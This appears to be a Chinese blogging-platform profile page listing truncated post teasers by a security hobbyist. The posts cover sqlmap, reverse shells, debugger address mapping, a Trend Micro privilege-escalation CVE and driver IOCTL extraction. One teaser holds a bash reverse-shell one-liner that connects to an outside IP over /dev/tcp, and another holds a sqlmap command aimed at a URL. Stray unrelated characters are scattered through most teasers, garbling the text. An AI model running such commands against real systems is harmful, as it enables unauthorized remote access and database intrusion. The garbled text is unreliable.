發(fā)簡信
IP屬地:江蘇
-
博客遷移說明
開始一段新的旅程较屿,博客遷移至Island's Blog歡迎大家訪問我的新博客档礁,另外新博客里也做了評論系統(tǒng)周偎,歡迎交流骚灸。簡書上將不再繼續(xù)更新 簡書確...
-
sqlmap學(xué)習(xí)查詢數(shù)據(jù)庫:python sqlmap.py -u "http://local.premeate.songboy.net/home/index....
-
sqlmap中文教程
http://note.youdao.com/noteshare?id=e55b73edde02c1057fe54f0cb0585070
-
web認(rèn)證
關(guān)于我正在做的路由器的web認(rèn)證方式是這樣的: 客戶端首先向服務(wù)器發(fā)送一條不帶認(rèn)證的get稳析。 服務(wù)器返回 Authorization Requi...
-
反彈shell
Reverse Shell bash反彈服務(wù)端: bash -c 'sh -i &>/dev/tcp/210.28.30.887/53 0>&1...
-
動(dòng)靜結(jié)合調(diào)試——IDA地址與windbg地址對應(yīng)
這是一個(gè)比較簡單的問題酝润,但是思想走了一點(diǎn)彎路祟绊,覺得有必要記錄一下.首先需要厘清幾個(gè)概念: 文件偏移地址(File Offset) 裝載地址 (I...
-
趨勢科技緩沖區(qū)溢出權(quán)限逃逸漏洞
CVE-2018-6232這個(gè)漏洞允許本地攻擊者通過有漏洞的趨勢科技軟件提權(quán)楼入。為了利用該漏洞哥捕,攻擊者首先得做到能在目標(biāo)系統(tǒng)上執(zhí)行低權(quán)限代碼。這個(gè)...
-
Some教訓(xùn)值得回味
我始終相信嘉熊,所有這些兜兜轉(zhuǎn)轉(zhuǎn)循環(huán)往復(fù)的事遥赚,在多年后都終有意義 計(jì)劃->執(zhí)行->反饋 閉環(huán)對于任務(wù)第一反應(yīng)首先不應(yīng)該是立刻上手,計(jì)劃是很重要的一步...
-
提取驅(qū)動(dòng)IOCTL code的實(shí)現(xiàn)
本文禁止轉(zhuǎn)載經(jīng)過多日探索阐肤,暫時(shí)找到了兩種比較可靠的提取驅(qū)動(dòng)IOCTL code的途徑凫佛,以下對具體執(zhí)行過程進(jìn)行簡介,并針對優(yōu)缺點(diǎn)進(jìn)行分析: IDA...